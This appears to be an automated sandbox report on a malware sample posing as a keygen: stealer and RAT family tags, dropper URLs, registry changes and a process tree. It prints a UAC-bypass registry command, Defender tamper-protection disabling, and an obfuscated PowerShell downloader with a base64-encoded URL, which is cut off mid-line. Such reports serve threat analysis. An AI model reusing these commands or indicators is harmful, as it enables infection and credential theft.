asyncrat | 201001-nyhbt4p25j_pw_infected[.]rar

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

01-10-2020 20:51

01-10-2020 20:51

01-10-2020 20:51

01-10-2020 20:51

01-10-2020 20:51

01-10-2020 20:49

Analysis

max time kernel
152s
max time network
165s
platform
windows7_x64
resource
win7
submitted
01-10-2020 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe

Score

10^/10

asyncrat azorult modiloader oski raccoon discovery evasion infostealer persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note

[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:36:09 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (522 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral163/memory/2476-381-0x00000000006B0000-0x00000000006B3000-memory.dmp	disable_win_def
behavioral163/memory/1248-396-0x0000000000630000-0x0000000000635000-memory.dmp	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Raccoon log file 1 IoCs
Detects a log file produced by the Raccoon Stealer.

Processes:

yara_rule

raccoon_log_file

yara_rule
raccoon_log_file

ModiLoader First Stage 3 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe	modiloader_stage1
C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe	modiloader_stage1
C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe	modiloader_stage1

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral163/memory/3008-417-0x0000000002F80000-0x0000000002FCC000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

10 1488 powershell.exe
12 1488 powershell.exe
16 1420 powershell.exe
17 1076 powershell.exe
20 1076 powershell.exe
21 1420 powershell.exe
Downloads MZ/PE file

flow	pid	process
10	1488	powershell.exe
12	1488	powershell.exe
16	1420	powershell.exe
17	1076	powershell.exe
20	1076	powershell.exe
21	1420	powershell.exe

Executes dropped EXE 31 IoCs

Processes:

Keygen.exemsr.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exemsr.exeNHtrdsaghfDF.exeewd.exezkh.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exezkh.exeNHtrdsaghfDF.exeewd.exezkh.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exezkh.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeewd.exehgfnmbasdo.exeewd.exehgfnmbasdo.exeaxcsdfa.exeaxcsdfa.exe1wd1PPK5LT.exeRBabUs54Us.exeeYPP1oZQ1b.exeEFWQHA1FzQ.exe

pid	process
1872	Keygen.exe
2496	msr.exe
2588	FVjhgtresfdbv.exe
2628	NHtrdsaghfDF.exe
2652	FVjhgtresfdbv.exe
2684	msr.exe
2744	NHtrdsaghfDF.exe
2900	ewd.exe
2920	zkh.exe
3028	FVjhgtresfdbv.exe
3060	NHtrdsaghfDF.exe
2124	FVjhgtresfdbv.exe
1552	zkh.exe
2212	NHtrdsaghfDF.exe
2356	ewd.exe
2400	zkh.exe
1568	FVjhgtresfdbv.exe
2544	NHtrdsaghfDF.exe
2680	zkh.exe
2588	NHtrdsaghfDF.exe
2860	FVjhgtresfdbv.exe
2476	ewd.exe
3012	hgfnmbasdo.exe
2964	ewd.exe
328	hgfnmbasdo.exe
2748	axcsdfa.exe
1604	axcsdfa.exe
1712	1wd1PPK5LT.exe
3008	RBabUs54Us.exe
1248	eYPP1oZQ1b.exe
2476	EFWQHA1FzQ.exe

Loads dropped DLL 61 IoCs

Processes:

cmd.exepowershell.exemsr.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exepowershell.exepowershell.exezkh.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exepowershell.exezkh.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeWScript.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exemsr.exehgfnmbasdo.exeWScript.exehgfnmbasdo.exeaxcsdfa.exe

pid	process
1804	cmd.exe
1488	powershell.exe
1488	powershell.exe
2496	msr.exe
2496	msr.exe
2496	msr.exe
2496	msr.exe
2588	FVjhgtresfdbv.exe
2628	NHtrdsaghfDF.exe
1420	powershell.exe
1076	powershell.exe
1076	powershell.exe
2920	zkh.exe
2920	zkh.exe
2920	zkh.exe
2920	zkh.exe
3028	FVjhgtresfdbv.exe
3060	NHtrdsaghfDF.exe
2044	powershell.exe
2400	zkh.exe
2400	zkh.exe
2400	zkh.exe
2400	zkh.exe
2544	NHtrdsaghfDF.exe
1568	FVjhgtresfdbv.exe
1788	WScript.exe
2652	FVjhgtresfdbv.exe
2652	FVjhgtresfdbv.exe
2652	FVjhgtresfdbv.exe
2652	FVjhgtresfdbv.exe
2652	FVjhgtresfdbv.exe
2860	FVjhgtresfdbv.exe
2860	FVjhgtresfdbv.exe
2860	FVjhgtresfdbv.exe
2860	FVjhgtresfdbv.exe
2860	FVjhgtresfdbv.exe
2124	FVjhgtresfdbv.exe
2124	FVjhgtresfdbv.exe
2124	FVjhgtresfdbv.exe
2124	FVjhgtresfdbv.exe
2124	FVjhgtresfdbv.exe
2684	msr.exe
3012	hgfnmbasdo.exe
2940	WScript.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
328	hgfnmbasdo.exe
328	hgfnmbasdo.exe
328	hgfnmbasdo.exe
328	hgfnmbasdo.exe
328	hgfnmbasdo.exe
2748	axcsdfa.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe
2684	msr.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

EFWQHA1FzQ.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	EFWQHA1FzQ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	EFWQHA1FzQ.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

RBabUs54Us.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ggeb = "C:\\Users\\Admin\\AppData\\Local\\begG.url"	RBabUs54Us.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

msr.exe

description ioc process

File created C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini msr.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini	msr.exe

Suspicious use of SetThreadContext 13 IoCs

Processes:

FVjhgtresfdbv.exemsr.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exezkh.exeNHtrdsaghfDF.exezkh.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeewd.exeewd.exehgfnmbasdo.exeaxcsdfa.exe

description	pid	process	target process
PID 2588 set thread context of 2652	2588	FVjhgtresfdbv.exe	FVjhgtresfdbv.exe
PID 2496 set thread context of 2684	2496	msr.exe	msr.exe
PID 2628 set thread context of 2744	2628	NHtrdsaghfDF.exe	NHtrdsaghfDF.exe
PID 3028 set thread context of 2124	3028	FVjhgtresfdbv.exe	FVjhgtresfdbv.exe
PID 2920 set thread context of 1552	2920	zkh.exe	zkh.exe
PID 3060 set thread context of 2212	3060	NHtrdsaghfDF.exe	NHtrdsaghfDF.exe
PID 2400 set thread context of 2680	2400	zkh.exe	zkh.exe
PID 2544 set thread context of 2588	2544	NHtrdsaghfDF.exe	NHtrdsaghfDF.exe
PID 1568 set thread context of 2860	1568	FVjhgtresfdbv.exe	FVjhgtresfdbv.exe
PID 2900 set thread context of 2476	2900	ewd.exe	ewd.exe
PID 2356 set thread context of 2964	2356	ewd.exe	ewd.exe
PID 3012 set thread context of 328	3012	hgfnmbasdo.exe	hgfnmbasdo.exe
PID 2748 set thread context of 1604	2748	axcsdfa.exe	axcsdfa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FVjhgtresfdbv.exehgfnmbasdo.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FVjhgtresfdbv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	hgfnmbasdo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FVjhgtresfdbv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FVjhgtresfdbv.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1892 timeout.exe
1580 timeout.exe
2720 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2208 taskkill.exe
1332 taskkill.exe
1400 taskkill.exe
980 taskkill.exe

pid	process
1892	timeout.exe
1580	timeout.exe
2720	timeout.exe

pid	process
2208	taskkill.exe
1332	taskkill.exe
1400	taskkill.exe
980	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\ms-settings\shell\open\command	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

952 reg.exe
2840 reg.exe

pid	process
952	reg.exe
2840	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

msr.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	msr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	msr.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEFWQHA1FzQ.exepowershell.exeeYPP1oZQ1b.exe

pid	process
1076	powershell.exe
2044	powershell.exe
1868	powershell.exe
1488	powershell.exe
1480	powershell.exe
1420	powershell.exe
1076	powershell.exe
1480	powershell.exe
1420	powershell.exe
1488	powershell.exe
2044	powershell.exe
1868	powershell.exe
2476	EFWQHA1FzQ.exe
2476	EFWQHA1FzQ.exe
560	powershell.exe
560	powershell.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe

Suspicious behavior: MapViewOfSection 9 IoCs

Processes:

FVjhgtresfdbv.exemsr.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exezkh.exeNHtrdsaghfDF.exezkh.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exe

pid	process
2588	FVjhgtresfdbv.exe
2496	msr.exe
2628	NHtrdsaghfDF.exe
3028	FVjhgtresfdbv.exe
2920	zkh.exe
3060	NHtrdsaghfDF.exe
2400	zkh.exe
2544	NHtrdsaghfDF.exe
1568	FVjhgtresfdbv.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeewd.exeewd.exetaskkill.exetaskkill.exetaskkill.exehgfnmbasdo.exetaskkill.exeaxcsdfa.exeEFWQHA1FzQ.exepowershell.exeeYPP1oZQ1b.exe1wd1PPK5LT.exePowershell.exe

description	pid	process
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	2900	ewd.exe
Token: SeDebugPrivilege	2356	ewd.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	3012	hgfnmbasdo.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	2748	axcsdfa.exe
Token: SeDebugPrivilege	2476	EFWQHA1FzQ.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	1248	eYPP1oZQ1b.exe
Token: SeDebugPrivilege	1712	1wd1PPK5LT.exe
Token: SeDebugPrivilege	800	Powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

Keygen.exemsr.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exezkh.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exezkh.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeeYPP1oZQ1b.exe

pid	process
1872	Keygen.exe
2496	msr.exe
2588	FVjhgtresfdbv.exe
2628	NHtrdsaghfDF.exe
2920	zkh.exe
3028	FVjhgtresfdbv.exe
3060	NHtrdsaghfDF.exe
2400	zkh.exe
2544	NHtrdsaghfDF.exe
1568	FVjhgtresfdbv.exe
1248	eYPP1oZQ1b.exe
1248	eYPP1oZQ1b.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen — копия (32).execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exe

description	pid	process	target process
PID 1196 wrote to memory of 1804	1196	Keygen — копия (32).exe	cmd.exe
PID 1196 wrote to memory of 1804	1196	Keygen — копия (32).exe	cmd.exe
PID 1196 wrote to memory of 1804	1196	Keygen — копия (32).exe	cmd.exe
PID 1196 wrote to memory of 1804	1196	Keygen — копия (32).exe	cmd.exe
PID 1804 wrote to memory of 1872	1804	cmd.exe	Keygen.exe
PID 1804 wrote to memory of 1872	1804	cmd.exe	Keygen.exe
PID 1804 wrote to memory of 1872	1804	cmd.exe	Keygen.exe
PID 1804 wrote to memory of 1872	1804	cmd.exe	Keygen.exe
PID 1804 wrote to memory of 1544	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1544	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1544	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1544	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1928	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1928	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1928	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1928	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1892	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1892	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1892	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1892	1804	cmd.exe	timeout.exe
PID 1544 wrote to memory of 1076	1544	mshta.exe	powershell.exe
PID 1928 wrote to memory of 2044	1928	mshta.exe	powershell.exe
PID 1544 wrote to memory of 1076	1544	mshta.exe	powershell.exe
PID 1928 wrote to memory of 2044	1928	mshta.exe	powershell.exe
PID 1544 wrote to memory of 1076	1544	mshta.exe	powershell.exe
PID 1928 wrote to memory of 2044	1928	mshta.exe	powershell.exe
PID 1544 wrote to memory of 1076	1544	mshta.exe	powershell.exe
PID 1928 wrote to memory of 2044	1928	mshta.exe	powershell.exe
PID 1804 wrote to memory of 992	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 992	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 992	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 992	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1584	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1584	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1584	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1584	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1580	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1580	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1580	1804	cmd.exe	timeout.exe
PID 1804 wrote to memory of 1580	1804	cmd.exe	timeout.exe
PID 992 wrote to memory of 1420	992	mshta.exe	powershell.exe
PID 992 wrote to memory of 1420	992	mshta.exe	powershell.exe
PID 992 wrote to memory of 1420	992	mshta.exe	powershell.exe
PID 992 wrote to memory of 1420	992	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1480	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1480	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1480	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1480	1584	mshta.exe	powershell.exe
PID 1804 wrote to memory of 1084	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1084	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1084	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 1084	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 848	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 848	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 848	1804	cmd.exe	mshta.exe
PID 1804 wrote to memory of 848	1804	cmd.exe	mshta.exe
PID 1084 wrote to memory of 1488	1084	mshta.exe	powershell.exe
PID 1084 wrote to memory of 1488	1084	mshta.exe	powershell.exe
PID 1084 wrote to memory of 1488	1084	mshta.exe	powershell.exe
PID 1084 wrote to memory of 1488	1084	mshta.exe	powershell.exe
PID 848 wrote to memory of 1868	848	mshta.exe	powershell.exe
PID 848 wrote to memory of 1868	848	mshta.exe	powershell.exe
PID 848 wrote to memory of 1868	848	mshta.exe	powershell.exe
PID 848 wrote to memory of 1868	848	mshta.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe
"C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\3082.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (32).exe""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1804

C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe
Keygen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1872

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\m.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = 